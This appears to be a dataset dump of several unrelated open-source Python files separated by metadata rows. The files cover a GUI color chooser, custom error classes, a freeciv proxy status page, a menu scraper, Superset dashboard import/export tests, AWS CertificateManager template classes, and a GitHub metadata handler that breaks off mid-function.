self._chooser = QuickColorChooser(
app,
prefs_id=prefs_id,
single_click=single_click,
)
self._chooser.choice_completed += self._choice_completed_cb
self.add(self._chooser)
def _choice_completed_cb(self, chooser):
"""Internal: close when a choice is (fully) made
Close the dialog on button release only to avoid accidental dabs
with the stylus.
"""
self.hide()
def advance(self):
"""Advances to the next color selector."""
self._chooser.advance()
## Classes: interface registration
Advanceable.register(QuickBrushChooser)
Advanceable.register(QuickColorChooser)
Advanceable.register(BrushChooserPopup)
Advanceable.register(ColorChooserPopup)
|
gpl-2.0
| -8,399,897,937,898,774,000
| 32.889881
| 79
| 0.626855
| false
| 3.91575
| false
| false
| false
|
xguse/blacktie
|
src/blacktie/utils/errors.py
|
1
|
2796
|
#*****************************************************************************
# errors.py (part of the blacktie package)
#
# (c) 2013 - Augustine Dunn
# James Laboratory
# Department of Biochemistry and Molecular Biology
# University of California Irvine
# wadunn83@gmail.com
#
# Licenced under the GNU General Public License 3.0 license.
#******************************************************************************
"""
####################
errors.py
####################
Code defining custom base error classes to provide a foundation for graceful error handling.
"""
import warnings
class BlacktieError(StandardError):
"""Base class for exceptions in the blacktie package."""
pass
class SystemCallError(BlacktieError):
"""Error raised when a problem occurs while attempting to run an external system call.
Attributes:
| ``errno`` -- return code from system call
| ``filename`` -- file in volved if any
| ``strerror`` -- error msg """
def __init__(self,errno,strerror,filename=None):
self.errno = errno
self.strerror = strerror
self.filename = filename
def __str__(self):
if not self.filename:
return """ERROR:\n %s.\nRETURN_STATE: %s.""" % (self.strerror.strip('\n'),
self.errno)
else:
return """ERROR in %s:\n %s.\nRETURN_STATE: %s.""" % (self.filename,
self.strerror.strip('\n'),
self.errno)
class SanityCheckError(BlacktieError):
"""When a 'state check' comes back as conflicting or nonsensical."""
pass
class UnexpectedValueError(BlacktieError):
"""When values that "should" not be possible happen; like if a variable was changed unexpectedly."""
pass
class InvalidFileFormatError(BlacktieError):
"""When errors occur due to malformed file formats."""
pass
class MissingArgumentError(BlacktieError):
"""When a required argument is missing from the parsed command line options."""
def __init__(self,errMsg):
self.msg = errMsg
def __str__(self):
return """ERROR: %s""" % (self.msg)
class InvalidOptionError(BlacktieError):
def __init__(self,optVal,optName,validVals=None):
self.optVal = optVal
self.optName = optName
self.validVals = validVals
def __str__(self):
if self.validVals:
return """ERROR: %s is not a valid value for arg:%s.\n\tValid values are: %s""" % (self.optVal,self.optName,self.validVals)
else:
return """ERROR: %s is not a valid value for arg:%s.""" % (self.optVal,self.optName)
|
gpl-3.0
| 6,638,738,641,271,444,000
| 30.784091
| 135
| 0.554006
| false
| 4.255708
| false
| false
| false
|
andreasrosdal/freeciv-web
|
freeciv-proxy/debugging.py
|
2
|
2198
|
# -*- coding: utf-8 -*-
'''
Freeciv - Copyright (C) 2009-2017 - Andreas Røsdal andrearo@pvv.ntnu.no
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
'''
import sys
from time import gmtime, strftime
import os
import platform
import threading
import time
from tornado import version as tornado_version
import gc
startTime = time.time()
def get_debug_info(civcoms):
code = "<html><head><meta http-equiv=\"refresh\" content=\"20\">" \
+ "<link href='/css/bootstrap.min.css' rel='stylesheet'></head>" \
+ "<body><div class='container'>" \
+ "<h2>Freeciv WebSocket Proxy Status</h2>" \
+ "<font color=\"green\">Process status: OK</font><br>"
code += "<b>Process Uptime: " + \
str(int(time.time() - startTime)) + " s.</b><br>"
code += ("Python version: %s %s (%s)<br>" % (
platform.python_implementation(),
platform.python_version(),
platform.python_build()[0],
))
cpu = ' '.join(platform.processor().split())
code += ("Platform: %s %s on '%s' <br>" % (
platform.machine(),
platform.system(),
cpu))
code += ("Tornado version %s <br>" % (tornado_version))
code += ("Number of threads: %i <br>" % (threading.activeCount()))
try:
code += ("<h3>Logged in users (count %i) :</h3>" % len(civcoms))
for key in list(civcoms.keys()):
code += (
"username: <b>%s</b> <br>Civserver: %d<br>Connect time: %d<br><br>" %
(civcoms[key].username,
civcoms[key].civserverport,
time.time() - civcoms[key].connect_time))
except:
print(("Unexpected error:" + str(sys.exc_info()[0])))
raise
code += "</div></body></html>"
return code
|
agpl-3.0
| -2,271,606,199,374,323,700
| 31.308824
| 85
| 0.600364
| false
| 3.595745
| false
| false
| false
|
rconjaerts/uniresto-scraper
|
main.py
|
1
|
2281
|
import io
import os
import json
import requests
import logging
from multiprocessing import Pool, cpu_count
from multiprocessing.dummy import Pool as ThreadPool
import config
from uniresto.util.mplog import MultiProcessingLog
import uniscrapers
mplog = MultiProcessingLog(config.LOG_FILENAME, 'a', 0, 0)
mplog.setFormatter(logging.Formatter(config.LOG_FORMAT))
logging.basicConfig(level=logging.WARNING) # TODO: logging.WARNING
logging.getLogger().addHandler(mplog)
_instances = {}
def find_scrapers():
"""Returns a list of Scraper subclass instances
"""
plugins = []
for class_name in uniscrapers.__all__:
cls = getattr(uniscrapers, class_name)
# Only instantiate each plugin class once.
if class_name not in _instances:
_instances[class_name] = cls()
plugins.append(_instances[class_name])
return plugins
def dump(data, filename):
# TODO: remove filename param when we are exporting to server
# This JSON writing business is temporary, until the server is ready
with io.open(os.path.join('.', filename), 'w', encoding='utf8') as f:
f.write(unicode(json.dumps(data, ensure_ascii=False)))
# TODO: wait for the server to be ready for us
# r = requests.post(config.SERVER_URL,
# json=data,
# params={'passPhrase': config.SERVER_AUTH_TOKEN})
# logging.info(r)
def run_scraper(scraper):
""" Runs the Scraper to get the data and dump it somewhere (db, json, ...)
"""
def get_data_and_dump((url, lang)):
try:
data = scraper.get_data(url, lang)
if not data:
raise Exception('lege data')
# TODO: remove filename param
dump(data, scraper.name + '_' + lang + '.json')
except Exception as exc:
# TODO: proper exception handling, not this catch-all crap
# TODO: reschedule this scraper
logging.exception(exc)
scraper.log = logging
pool = ThreadPool()
pool.map(get_data_and_dump, scraper.remotes)
def main():
logging.info("Start scraping")
pool = Pool(cpu_count() // 2)
pool.map(run_scraper, find_scrapers())
logging.info("Finish scraping")
if __name__ == '__main__':
main()
|
gpl-2.0
| 3,455,024,879,674,022,000
| 27.873418
| 78
| 0.640509
| false
| 3.814381
| true
| false
| false
|
zhouyao1994/incubator-superset
|
tests/import_export_tests.py
|
1
|
28880
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# isort:skip_file
"""Unit tests for Superset"""
import json
import unittest
from flask import g
from sqlalchemy.orm.session import make_transient
from tests.test_app import app
from superset import db, security_manager
from superset.connectors.druid.models import DruidColumn, DruidDatasource, DruidMetric
from superset.connectors.sqla.models import SqlaTable, SqlMetric, TableColumn
from superset.models import core as models
from superset.utils import core as utils
from .base_tests import SupersetTestCase
class ImportExportTests(SupersetTestCase):
"""Testing export import functionality for dashboards"""
@classmethod
def delete_imports(cls):
with app.app_context():
# Imported data clean up
session = db.session
for slc in session.query(models.Slice):
if "remote_id" in slc.params_dict:
session.delete(slc)
for dash in session.query(models.Dashboard):
if "remote_id" in dash.params_dict:
session.delete(dash)
for table in session.query(SqlaTable):
if "remote_id" in table.params_dict:
session.delete(table)
for datasource in session.query(DruidDatasource):
if "remote_id" in datasource.params_dict:
session.delete(datasource)
session.commit()
@classmethod
def setUpClass(cls):
cls.delete_imports()
cls.create_druid_test_objects()
@classmethod
def tearDownClass(cls):
cls.delete_imports()
def create_slice(
self,
name,
ds_id=None,
id=None,
db_name="examples",
table_name="wb_health_population",
):
params = {
"num_period_compare": "10",
"remote_id": id,
"datasource_name": table_name,
"database_name": db_name,
"schema": "",
# Test for trailing commas
"metrics": ["sum__signup_attempt_email", "sum__signup_attempt_facebook"],
}
if table_name and not ds_id:
table = self.get_table_by_name(table_name)
if table:
ds_id = table.id
return models.Slice(
slice_name=name,
datasource_type="table",
viz_type="bubble",
params=json.dumps(params),
datasource_id=ds_id,
id=id,
)
def create_dashboard(self, title, id=0, slcs=[]):
json_metadata = {"remote_id": id}
return models.Dashboard(
id=id,
dashboard_title=title,
slices=slcs,
position_json='{"size_y": 2, "size_x": 2}',
slug="{}_imported".format(title.lower()),
json_metadata=json.dumps(json_metadata),
)
def create_table(self, name, schema="", id=0, cols_names=[], metric_names=[]):
params = {"remote_id": id, "database_name": "examples"}
table = SqlaTable(
id=id, schema=schema, table_name=name, params=json.dumps(params)
)
for col_name in cols_names:
table.columns.append(TableColumn(column_name=col_name))
for metric_name in metric_names:
table.metrics.append(SqlMetric(metric_name=metric_name, expression=""))
return table
def create_druid_datasource(self, name, id=0, cols_names=[], metric_names=[]):
params = {"remote_id": id, "database_name": "druid_test"}
datasource = DruidDatasource(
id=id,
datasource_name=name,
cluster_name="druid_test",
params=json.dumps(params),
)
for col_name in cols_names:
datasource.columns.append(DruidColumn(column_name=col_name))
for metric_name in metric_names:
datasource.metrics.append(DruidMetric(metric_name=metric_name, json="{}"))
return datasource
def get_slice(self, slc_id):
return db.session.query(models.Slice).filter_by(id=slc_id).first()
def get_slice_by_name(self, name):
return db.session.query(models.Slice).filter_by(slice_name=name).first()
def get_dash(self, dash_id):
return db.session.query(models.Dashboard).filter_by(id=dash_id).first()
def get_datasource(self, datasource_id):
return db.session.query(DruidDatasource).filter_by(id=datasource_id).first()
def get_table_by_name(self, name):
return db.session.query(SqlaTable).filter_by(table_name=name).first()
def assert_dash_equals(self, expected_dash, actual_dash, check_position=True):
self.assertEqual(expected_dash.slug, actual_dash.slug)
self.assertEqual(expected_dash.dashboard_title, actual_dash.dashboard_title)
self.assertEqual(len(expected_dash.slices), len(actual_dash.slices))
expected_slices = sorted(expected_dash.slices, key=lambda s: s.slice_name or "")
actual_slices = sorted(actual_dash.slices, key=lambda s: s.slice_name or "")
for e_slc, a_slc in zip(expected_slices, actual_slices):
self.assert_slice_equals(e_slc, a_slc)
if check_position:
self.assertEqual(expected_dash.position_json, actual_dash.position_json)
def assert_table_equals(self, expected_ds, actual_ds):
self.assertEqual(expected_ds.table_name, actual_ds.table_name)
self.assertEqual(expected_ds.main_dttm_col, actual_ds.main_dttm_col)
self.assertEqual(expected_ds.schema, actual_ds.schema)
self.assertEqual(len(expected_ds.metrics), len(actual_ds.metrics))
self.assertEqual(len(expected_ds.columns), len(actual_ds.columns))
self.assertEqual(
set([c.column_name for c in expected_ds.columns]),
set([c.column_name for c in actual_ds.columns]),
)
self.assertEqual(
set([m.metric_name for m in expected_ds.metrics]),
set([m.metric_name for m in actual_ds.metrics]),
)
def assert_datasource_equals(self, expected_ds, actual_ds):
self.assertEqual(expected_ds.datasource_name, actual_ds.datasource_name)
self.assertEqual(expected_ds.main_dttm_col, actual_ds.main_dttm_col)
self.assertEqual(len(expected_ds.metrics), len(actual_ds.metrics))
self.assertEqual(len(expected_ds.columns), len(actual_ds.columns))
self.assertEqual(
set([c.column_name for c in expected_ds.columns]),
set([c.column_name for c in actual_ds.columns]),
)
self.assertEqual(
set([m.metric_name for m in expected_ds.metrics]),
set([m.metric_name for m in actual_ds.metrics]),
)
def assert_slice_equals(self, expected_slc, actual_slc):
# to avoid bad slice data (no slice_name)
expected_slc_name = expected_slc.slice_name or ""
actual_slc_name = actual_slc.slice_name or ""
self.assertEqual(expected_slc_name, actual_slc_name)
self.assertEqual(expected_slc.datasource_type, actual_slc.datasource_type)
self.assertEqual(expected_slc.viz_type, actual_slc.viz_type)
exp_params = json.loads(expected_slc.params)
actual_params = json.loads(actual_slc.params)
diff_params_keys = (
"schema",
"database_name",
"datasource_name",
"remote_id",
"import_time",
)
for k in diff_params_keys:
if k in actual_params:
actual_params.pop(k)
if k in exp_params:
exp_params.pop(k)
self.assertEqual(exp_params, actual_params)
def assert_only_exported_slc_fields(self, expected_dash, actual_dash):
""" only exported json has this params
imported/created dashboard has relationships to other models instead
"""
expected_slices = sorted(expected_dash.slices, key=lambda s: s.slice_name or "")
actual_slices = sorted(actual_dash.slices, key=lambda s: s.slice_name or "")
for e_slc, a_slc in zip(expected_slices, actual_slices):
params = a_slc.params_dict
self.assertEqual(e_slc.datasource.name, params["datasource_name"])
self.assertEqual(e_slc.datasource.schema, params["schema"])
self.assertEqual(e_slc.datasource.database.name, params["database_name"])
def test_export_1_dashboard(self):
self.login("admin")
birth_dash = self.get_dash_by_slug("births")
export_dash_url = "/dashboard/export_dashboards_form?id={}&action=go".format(
birth_dash.id
)
resp = self.client.get(export_dash_url)
exported_dashboards = json.loads(
resp.data.decode("utf-8"), object_hook=utils.decode_dashboards
)["dashboards"]
birth_dash = self.get_dash_by_slug("births")
self.assert_only_exported_slc_fields(birth_dash, exported_dashboards[0])
self.assert_dash_equals(birth_dash, exported_dashboards[0])
self.assertEqual(
birth_dash.id,
json.loads(
exported_dashboards[0].json_metadata,
object_hook=utils.decode_dashboards,
)["remote_id"],
)
exported_tables = json.loads(
resp.data.decode("utf-8"), object_hook=utils.decode_dashboards
)["datasources"]
self.assertEqual(1, len(exported_tables))
self.assert_table_equals(
self.get_table_by_name("birth_names"), exported_tables[0]
)
def test_export_2_dashboards(self):
self.login("admin")
birth_dash = self.get_dash_by_slug("births")
world_health_dash = self.get_dash_by_slug("world_health")
export_dash_url = "/dashboard/export_dashboards_form?id={}&id={}&action=go".format(
birth_dash.id, world_health_dash.id
)
resp = self.client.get(export_dash_url)
resp_data = json.loads(
resp.data.decode("utf-8"), object_hook=utils.decode_dashboards
)
exported_dashboards = sorted(
resp_data.get("dashboards"), key=lambda d: d.dashboard_title
)
self.assertEqual(2, len(exported_dashboards))
birth_dash = self.get_dash_by_slug("births")
self.assert_only_exported_slc_fields(birth_dash, exported_dashboards[0])
self.assert_dash_equals(birth_dash, exported_dashboards[0])
self.assertEqual(
birth_dash.id, json.loads(exported_dashboards[0].json_metadata)["remote_id"]
)
world_health_dash = self.get_dash_by_slug("world_health")
self.assert_only_exported_slc_fields(world_health_dash, exported_dashboards[1])
self.assert_dash_equals(world_health_dash, exported_dashboards[1])
self.assertEqual(
world_health_dash.id,
json.loads(exported_dashboards[1].json_metadata)["remote_id"],
)
exported_tables = sorted(
resp_data.get("datasources"), key=lambda t: t.table_name
)
self.assertEqual(2, len(exported_tables))
self.assert_table_equals(
self.get_table_by_name("birth_names"), exported_tables[0]
)
self.assert_table_equals(
self.get_table_by_name("wb_health_population"), exported_tables[1]
)
def test_import_1_slice(self):
expected_slice = self.create_slice("Import Me", id=10001)
slc_id = models.Slice.import_obj(expected_slice, None, import_time=1989)
slc = self.get_slice(slc_id)
self.assertEqual(slc.datasource.perm, slc.perm)
self.assert_slice_equals(expected_slice, slc)
table_id = self.get_table_by_name("wb_health_population").id
self.assertEqual(table_id, self.get_slice(slc_id).datasource_id)
def test_import_2_slices_for_same_table(self):
table_id = self.get_table_by_name("wb_health_population").id
# table_id != 666, import func will have to find the table
slc_1 = self.create_slice("Import Me 1", ds_id=666, id=10002)
slc_id_1 = models.Slice.import_obj(slc_1, None)
slc_2 = self.create_slice("Import Me 2", ds_id=666, id=10003)
slc_id_2 = models.Slice.import_obj(slc_2, None)
imported_slc_1 = self.get_slice(slc_id_1)
imported_slc_2 = self.get_slice(slc_id_2)
self.assertEqual(table_id, imported_slc_1.datasource_id)
self.assert_slice_equals(slc_1, imported_slc_1)
self.assertEqual(imported_slc_1.datasource.perm, imported_slc_1.perm)
self.assertEqual(table_id, imported_slc_2.datasource_id)
self.assert_slice_equals(slc_2, imported_slc_2)
self.assertEqual(imported_slc_2.datasource.perm, imported_slc_2.perm)
def test_import_slices_for_non_existent_table(self):
with self.assertRaises(AttributeError):
models.Slice.import_obj(
self.create_slice("Import Me 3", id=10004, table_name="non_existent"),
None,
)
def test_import_slices_override(self):
slc = self.create_slice("Import Me New", id=10005)
slc_1_id = models.Slice.import_obj(slc, None, import_time=1990)
slc.slice_name = "Import Me New"
imported_slc_1 = self.get_slice(slc_1_id)
slc_2 = self.create_slice("Import Me New", id=10005)
slc_2_id = models.Slice.import_obj(slc_2, imported_slc_1, import_time=1990)
self.assertEqual(slc_1_id, slc_2_id)
imported_slc_2 = self.get_slice(slc_2_id)
self.assert_slice_equals(slc, imported_slc_2)
def test_import_empty_dashboard(self):
empty_dash = self.create_dashboard("empty_dashboard", id=10001)
imported_dash_id = models.Dashboard.import_obj(empty_dash, import_time=1989)
imported_dash = self.get_dash(imported_dash_id)
self.assert_dash_equals(empty_dash, imported_dash, check_position=False)
def test_import_dashboard_1_slice(self):
slc = self.create_slice("health_slc", id=10006)
dash_with_1_slice = self.create_dashboard(
"dash_with_1_slice", slcs=[slc], id=10002
)
dash_with_1_slice.position_json = """
{{"DASHBOARD_VERSION_KEY": "v2",
"DASHBOARD_CHART_TYPE-{0}": {{
"type": "DASHBOARD_CHART_TYPE",
"id": {0},
"children": [],
"meta": {{
"width": 4,
"height": 50,
"chartId": {0}
}}
}}
}}
""".format(
slc.id
)
imported_dash_id = models.Dashboard.import_obj(
dash_with_1_slice, import_time=1990
)
imported_dash = self.get_dash(imported_dash_id)
expected_dash = self.create_dashboard("dash_with_1_slice", slcs=[slc], id=10002)
make_transient(expected_dash)
self.assert_dash_equals(expected_dash, imported_dash, check_position=False)
self.assertEqual(
{"remote_id": 10002, "import_time": 1990},
json.loads(imported_dash.json_metadata),
)
expected_position = dash_with_1_slice.position
# new slice id (auto-incremental) assigned on insert
# id from json is used only for updating position with new id
meta = expected_position["DASHBOARD_CHART_TYPE-10006"]["meta"]
meta["chartId"] = imported_dash.slices[0].id
self.assertEqual(expected_position, imported_dash.position)
def test_import_dashboard_2_slices(self):
e_slc = self.create_slice("e_slc", id=10007, table_name="energy_usage")
b_slc = self.create_slice("b_slc", id=10008, table_name="birth_names")
dash_with_2_slices = self.create_dashboard(
"dash_with_2_slices", slcs=[e_slc, b_slc], id=10003
)
dash_with_2_slices.json_metadata = json.dumps(
{
"remote_id": 10003,
"filter_immune_slices": ["{}".format(e_slc.id)],
"expanded_slices": {
"{}".format(e_slc.id): True,
"{}".format(b_slc.id): False,
},
}
)
imported_dash_id = models.Dashboard.import_obj(
dash_with_2_slices, import_time=1991
)
imported_dash = self.get_dash(imported_dash_id)
expected_dash = self.create_dashboard(
"dash_with_2_slices", slcs=[e_slc, b_slc], id=10003
)
make_transient(expected_dash)
self.assert_dash_equals(imported_dash, expected_dash, check_position=False)
i_e_slc = self.get_slice_by_name("e_slc")
i_b_slc = self.get_slice_by_name("b_slc")
expected_json_metadata = {
"remote_id": 10003,
"import_time": 1991,
"filter_immune_slices": ["{}".format(i_e_slc.id)],
"expanded_slices": {
"{}".format(i_e_slc.id): True,
"{}".format(i_b_slc.id): False,
},
}
self.assertEqual(
expected_json_metadata, json.loads(imported_dash.json_metadata)
)
def test_import_override_dashboard_2_slices(self):
e_slc = self.create_slice("e_slc", id=10009, table_name="energy_usage")
b_slc = self.create_slice("b_slc", id=10010, table_name="birth_names")
dash_to_import = self.create_dashboard(
"override_dashboard", slcs=[e_slc, b_slc], id=10004
)
imported_dash_id_1 = models.Dashboard.import_obj(
dash_to_import, import_time=1992
)
# create new instances of the slices
e_slc = self.create_slice("e_slc", id=10009, table_name="energy_usage")
b_slc = self.create_slice("b_slc", id=10010, table_name="birth_names")
c_slc = self.create_slice("c_slc", id=10011, table_name="birth_names")
dash_to_import_override = self.create_dashboard(
"override_dashboard_new", slcs=[e_slc, b_slc, c_slc], id=10004
)
imported_dash_id_2 = models.Dashboard.import_obj(
dash_to_import_override, import_time=1992
)
# override doesn't change the id
self.assertEqual(imported_dash_id_1, imported_dash_id_2)
expected_dash = self.create_dashboard(
"override_dashboard_new", slcs=[e_slc, b_slc, c_slc], id=10004
)
make_transient(expected_dash)
imported_dash = self.get_dash(imported_dash_id_2)
self.assert_dash_equals(expected_dash, imported_dash, check_position=False)
self.assertEqual(
{"remote_id": 10004, "import_time": 1992},
json.loads(imported_dash.json_metadata),
)
def test_import_new_dashboard_slice_reset_ownership(self):
admin_user = security_manager.find_user(username="admin")
self.assertTrue(admin_user)
gamma_user = security_manager.find_user(username="gamma")
self.assertTrue(gamma_user)
g.user = gamma_user
dash_with_1_slice = self._create_dashboard_for_import(id_=10200)
# set another user as an owner of importing dashboard
dash_with_1_slice.created_by = admin_user
dash_with_1_slice.changed_by = admin_user
dash_with_1_slice.owners = [admin_user]
imported_dash_id = models.Dashboard.import_obj(dash_with_1_slice)
imported_dash = self.get_dash(imported_dash_id)
self.assertEqual(imported_dash.created_by, gamma_user)
self.assertEqual(imported_dash.changed_by, gamma_user)
self.assertEqual(imported_dash.owners, [gamma_user])
imported_slc = imported_dash.slices[0]
self.assertEqual(imported_slc.created_by, gamma_user)
self.assertEqual(imported_slc.changed_by, gamma_user)
self.assertEqual(imported_slc.owners, [gamma_user])
def test_import_override_dashboard_slice_reset_ownership(self):
admin_user = security_manager.find_user(username="admin")
self.assertTrue(admin_user)
gamma_user = security_manager.find_user(username="gamma")
self.assertTrue(gamma_user)
g.user = gamma_user
dash_with_1_slice = self._create_dashboard_for_import(id_=10300)
imported_dash_id = models.Dashboard.import_obj(dash_with_1_slice)
imported_dash = self.get_dash(imported_dash_id)
self.assertEqual(imported_dash.created_by, gamma_user)
self.assertEqual(imported_dash.changed_by, gamma_user)
self.assertEqual(imported_dash.owners, [gamma_user])
imported_slc = imported_dash.slices[0]
self.assertEqual(imported_slc.created_by, gamma_user)
self.assertEqual(imported_slc.changed_by, gamma_user)
self.assertEqual(imported_slc.owners, [gamma_user])
# re-import with another user shouldn't change the permissions
g.user = admin_user
dash_with_1_slice = self._create_dashboard_for_import(id_=10300)
imported_dash_id = models.Dashboard.import_obj(dash_with_1_slice)
imported_dash = self.get_dash(imported_dash_id)
self.assertEqual(imported_dash.created_by, gamma_user)
self.assertEqual(imported_dash.changed_by, gamma_user)
self.assertEqual(imported_dash.owners, [gamma_user])
imported_slc = imported_dash.slices[0]
self.assertEqual(imported_slc.created_by, gamma_user)
self.assertEqual(imported_slc.changed_by, gamma_user)
self.assertEqual(imported_slc.owners, [gamma_user])
def _create_dashboard_for_import(self, id_=10100):
slc = self.create_slice("health_slc" + str(id_), id=id_ + 1)
dash_with_1_slice = self.create_dashboard(
"dash_with_1_slice" + str(id_), slcs=[slc], id=id_ + 2
)
dash_with_1_slice.position_json = """
{{"DASHBOARD_VERSION_KEY": "v2",
"DASHBOARD_CHART_TYPE-{0}": {{
"type": "DASHBOARD_CHART_TYPE",
"id": {0},
"children": [],
"meta": {{
"width": 4,
"height": 50,
"chartId": {0}
}}
}}
}}
""".format(
slc.id
)
return dash_with_1_slice
def test_import_table_no_metadata(self):
table = self.create_table("pure_table", id=10001)
imported_id = SqlaTable.import_obj(table, import_time=1989)
imported = self.get_table(imported_id)
self.assert_table_equals(table, imported)
def test_import_table_1_col_1_met(self):
table = self.create_table(
"table_1_col_1_met", id=10002, cols_names=["col1"], metric_names=["metric1"]
)
imported_id = SqlaTable.import_obj(table, import_time=1990)
imported = self.get_table(imported_id)
self.assert_table_equals(table, imported)
self.assertEqual(
{"remote_id": 10002, "import_time": 1990, "database_name": "examples"},
json.loads(imported.params),
)
def test_import_table_2_col_2_met(self):
table = self.create_table(
"table_2_col_2_met",
id=10003,
cols_names=["c1", "c2"],
metric_names=["m1", "m2"],
)
imported_id = SqlaTable.import_obj(table, import_time=1991)
imported = self.get_table(imported_id)
self.assert_table_equals(table, imported)
def test_import_table_override(self):
table = self.create_table(
"table_override", id=10003, cols_names=["col1"], metric_names=["m1"]
)
imported_id = SqlaTable.import_obj(table, import_time=1991)
table_over = self.create_table(
"table_override",
id=10003,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_over_id = SqlaTable.import_obj(table_over, import_time=1992)
imported_over = self.get_table(imported_over_id)
self.assertEqual(imported_id, imported_over.id)
expected_table = self.create_table(
"table_override",
id=10003,
metric_names=["new_metric1", "m1"],
cols_names=["col1", "new_col1", "col2", "col3"],
)
self.assert_table_equals(expected_table, imported_over)
def test_import_table_override_identical(self):
table = self.create_table(
"copy_cat",
id=10004,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id = SqlaTable.import_obj(table, import_time=1993)
copy_table = self.create_table(
"copy_cat",
id=10004,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id_copy = SqlaTable.import_obj(copy_table, import_time=1994)
self.assertEqual(imported_id, imported_id_copy)
self.assert_table_equals(copy_table, self.get_table(imported_id))
def test_import_druid_no_metadata(self):
datasource = self.create_druid_datasource("pure_druid", id=10001)
imported_id = DruidDatasource.import_obj(datasource, import_time=1989)
imported = self.get_datasource(imported_id)
self.assert_datasource_equals(datasource, imported)
def test_import_druid_1_col_1_met(self):
datasource = self.create_druid_datasource(
"druid_1_col_1_met", id=10002, cols_names=["col1"], metric_names=["metric1"]
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1990)
imported = self.get_datasource(imported_id)
self.assert_datasource_equals(datasource, imported)
self.assertEqual(
{"remote_id": 10002, "import_time": 1990, "database_name": "druid_test"},
json.loads(imported.params),
)
def test_import_druid_2_col_2_met(self):
datasource = self.create_druid_datasource(
"druid_2_col_2_met",
id=10003,
cols_names=["c1", "c2"],
metric_names=["m1", "m2"],
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1991)
imported = self.get_datasource(imported_id)
self.assert_datasource_equals(datasource, imported)
def test_import_druid_override(self):
datasource = self.create_druid_datasource(
"druid_override", id=10004, cols_names=["col1"], metric_names=["m1"]
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1991)
table_over = self.create_druid_datasource(
"druid_override",
id=10004,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_over_id = DruidDatasource.import_obj(table_over, import_time=1992)
imported_over = self.get_datasource(imported_over_id)
self.assertEqual(imported_id, imported_over.id)
expected_datasource = self.create_druid_datasource(
"druid_override",
id=10004,
metric_names=["new_metric1", "m1"],
cols_names=["col1", "new_col1", "col2", "col3"],
)
self.assert_datasource_equals(expected_datasource, imported_over)
def test_import_druid_override_identical(self):
datasource = self.create_druid_datasource(
"copy_cat",
id=10005,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1993)
copy_datasource = self.create_druid_datasource(
"copy_cat",
id=10005,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id_copy = DruidDatasource.import_obj(copy_datasource, import_time=1994)
self.assertEqual(imported_id, imported_id_copy)
self.assert_datasource_equals(copy_datasource, self.get_datasource(imported_id))
if __name__ == "__main__":
unittest.main()
|
apache-2.0
| -5,938,705,838,612,700,000
| 40.494253
| 91
| 0.604778
| false
| 3.549656
| true
| false
| false
|
cloudtools/troposphere
|
troposphere/certificatemanager.py
|
1
|
1246
|
# Copyright (c) 2012-2021, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
#
# *** Do not modify - this file is autogenerated ***
# Resource specification version: 31.1.0
from troposphere import Tags
from . import AWSObject, AWSProperty
from .validators import integer
class ExpiryEventsConfiguration(AWSProperty):
props = {
"DaysBeforeExpiry": (integer, False),
}
class Account(AWSObject):
resource_type = "AWS::CertificateManager::Account"
props = {
"ExpiryEventsConfiguration": (ExpiryEventsConfiguration, True),
}
class DomainValidationOption(AWSProperty):
props = {
"DomainName": (str, True),
"HostedZoneId": (str, False),
"ValidationDomain": (str, False),
}
class Certificate(AWSObject):
resource_type = "AWS::CertificateManager::Certificate"
props = {
"CertificateAuthorityArn": (str, False),
"CertificateTransparencyLoggingPreference": (str, False),
"DomainName": (str, True),
"DomainValidationOptions": ([DomainValidationOption], False),
"SubjectAlternativeNames": ([str], False),
"Tags": ((Tags, list), False),
"ValidationMethod": (str, False),
}
|
bsd-2-clause
| -346,566,488,791,936,300
| 24.428571
| 71
| 0.658106
| false
| 3.968153
| false
| false
| false
|
QLGu/djangopackages
|
package/repos/github.py
|
2
|
2521
|
from time import sleep
from django.conf import settings
from django.utils import timezone
from github3 import GitHub, login
import requests
from base_handler import BaseHandler
from package.utils import uniquer
class GitHubHandler(BaseHandler):
title = "Github"
url_regex = '(http|https|git)://github.com/'
url = 'https://github.com'
repo_regex = r'(?:http|https|git)://github.com/[^/]*/([^/]*)/{0,1}'
slug_regex = repo_regex
def __init__(self):
if settings.GITHUB_TOKEN:
self.github = login(token=settings.GITHUB_TOKEN)
else:
self.github = GitHub()
def manage_ratelimit(self):
while self.github.ratelimit_remaining < 10:
sleep(1)
def _get_repo(self, package):
repo_name = package.repo_name()
if repo_name.endswith("/"):
repo_name = repo_name[:-1]
try:
username, repo_name = package.repo_name().split('/')
except ValueError:
return None
return self.github.repository(username, repo_name)
def fetch_metadata(self, package):
self.manage_ratelimit()
repo = self._get_repo(package)
if repo is None:
return package
package.repo_watchers = repo.watchers
package.repo_forks = repo.forks
package.repo_description = repo.description
contributors = []
for contributor in repo.iter_contributors():
contributors.append(contributor.login)
self.manage_ratelimit()
if contributors:
package.participants = ','.join(uniquer(contributors))
return package
def fetch_commits(self, package):
self.manage_ratelimit()
repo = self._get_repo(package)
if repo is None:
return package
from package.models import Commit # Added here to avoid circular imports
for commit in repo.iter_commits():
self.manage_ratelimit()
